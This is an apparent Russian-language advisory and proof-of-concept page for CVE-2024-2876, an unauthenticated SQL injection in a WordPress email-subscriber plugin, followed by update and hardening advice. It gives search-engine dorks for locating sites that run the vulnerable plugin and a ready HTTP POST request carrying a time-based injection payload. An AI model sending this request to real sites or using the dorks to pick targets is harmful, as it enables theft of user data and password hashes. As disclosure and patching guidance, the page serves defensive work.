
Эксплойт proof-of-concept для критической уязвимости SQL-инъекции в плагине WordPress Email Subscribers. Включает детали эксплуатации, HTTP-запрос и поисковые дорки.
CVE-2024-2876 — это критическая уязвимость безопасности, обнаруженная в плагине «Email Subscribers by Icegram Express» для WordPress. Эта уязвимость затрагивает версии до 5.7.14 включительно и представляет значительный риск для более чем 90 000 веб-сайтов.
Уязвимость представляет собой дефект SQL-инъекции, который позволяет неаутентифицированным злоумышленникам выполнять вредоносные SQL-запросы к базам данных WordPress. Манипулируя пользовательскими вводами, которые не проходят должную санитарную обработку, злоумышленники могут извлекать конфиденциальную информацию, такую как имена пользователей, адреса электронной почты, хэши паролей и списки подписчиков.
SQL-инъекция происходит внутри функции run класса IG_ES_Subscribers_Query плагина, где недостаточная проверка входных данных приводит к несанкционированному выполнению SQL-кода. Это нарушает целостность и конфиденциальность данных, хранящихся в базе данных WordPress.
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Немедленное обновление: Если вы используете плагин «Email Subscribers by Icegram Express», немедленно обновите его до версии 5.7.15 или новее, чтобы применить исправление безопасности.
Регулярные аудиты: Регулярно проверяйте и обновляйте все плагины и темы WordPress до последних версий для обеспечения безопасности.
Плагины безопасности: Используйте надежные плагины безопасности WordPress для усиления защиты от SQL-инъекций и других киберугроз.
Надежные парольные политики: Используйте надежные и уникальные пароли для всех учетных записей, связанных с вашим сайтом WordPress, чтобы снизить риски несанкционированного доступа.
Необновление затронутого плагина может оставить веб-сайты уязвимыми для утечек данных и несанкционированного доступа. Учитывая широкое распространение этого плагина, немедленные действия имеют решающее значение для защиты установок.